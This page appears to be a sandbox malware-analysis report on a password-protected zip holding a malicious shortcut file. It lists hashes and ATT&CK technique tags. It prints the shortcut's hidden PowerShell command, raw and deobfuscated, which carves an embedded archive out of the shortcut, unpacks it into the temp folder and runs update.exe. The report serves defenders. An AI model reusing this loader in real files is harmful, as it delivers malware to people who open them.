Malicious
Malicious

bb952709ef032b6e89a58f96a025b1b73eb16a[...]ted.zip

ZIP Archive
|
MD5: ef4bb8f41f4262193eb2b599c573ba40
|
Size: 207.89 KB
|
application/zip

Zip Archive
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated

Print
General
Structural Analysis
Config.0
Yara Rules1
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
ef4bb8f41f4262193eb2b599c573ba40
Sha1
baa0b861db90f186fdc481facdb2bdfc74b4f70a
Sha256
4d9d5dddb6c278fc4c4c24d73a01500194992b1d0254e9faec9ff4fa22cbe94f
Sha384
8a7b94ebfbf555a7c33db6479dcc04c8507939edfb71c8b984d7baad8d66a981a53ec98f880bb979054c37b45ddd2b2d
Sha512
66e04a675d3efeb44d5dbb550a229e981dd4605de87eb50e38d4a0e31ae8189e5cddbd07cb44f58b942e8a3390fc20414a40407d05c2cb76af77141b3c4bec1b
SSDeep
3072:xtYbURcUZ022l6z/MUfS3jGja6gqAPyOLRQX91pSmKMb+UBbDnExFG:x+URcE5fpjx5K9LG9/SHhCbDnExY
TLSH
8B14131A2485BE53DFE488F46D944A04CD8F2EA4FEB700D419AB7BB7F0CA457BD058A4
File Structure
bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
filename.txt
Archive Entry
bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin
Archive Entry
Zip Archive
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Powershell: Hidden Execution
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
PowerShell
Powershell: Hidden Execution
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00209578} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = '%TEMP%\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& .\update.exe

Deobfuscated PowerShell

$obf_lnkpath = Get-ChildItem "*.lnk" "^" | Where-Object $_."length" -eq 209578 "^" | Select-Object -ExpandProperty "FullName" $obf_file = [File]::"ReadAllBytes"($obf_lnkpath) $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip" $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path) $obf_dir = [Path]::"GetDirectoryName"($obf_path) [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]) Set-Location $obf_dir Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force "^" | Out-Null Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force "^" | Out-Null ^ & .\update.exe

Deobfuscated PowerShell

$obf_lnkpath = Get-ChildItem "*.lnk" "^" | Where-Object $_."length" -eq 209578 "^" | Select-Object -ExpandProperty "FullName" $obf_file = [File]::"ReadAllBytes"($obf_lnkpath) $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip" $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path) $obf_dir = [Path]::"GetDirectoryName"($obf_path) [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]) Set-Location $obf_dir Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force "^" | Out-Null Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force "^" | Out-Null ^ & .\update.exe iconlocation: "%WINDIR%\System32\UserAccountControlSettings.exe" extradata: environmentvariabledatablock: headerblocksize: 788 788 blocksignature: -1610612735 targetansi: "%windir%\system32\cmd.exe" targetunicode: "%windir%\system32\cmd.exe"

bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip (207.89 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙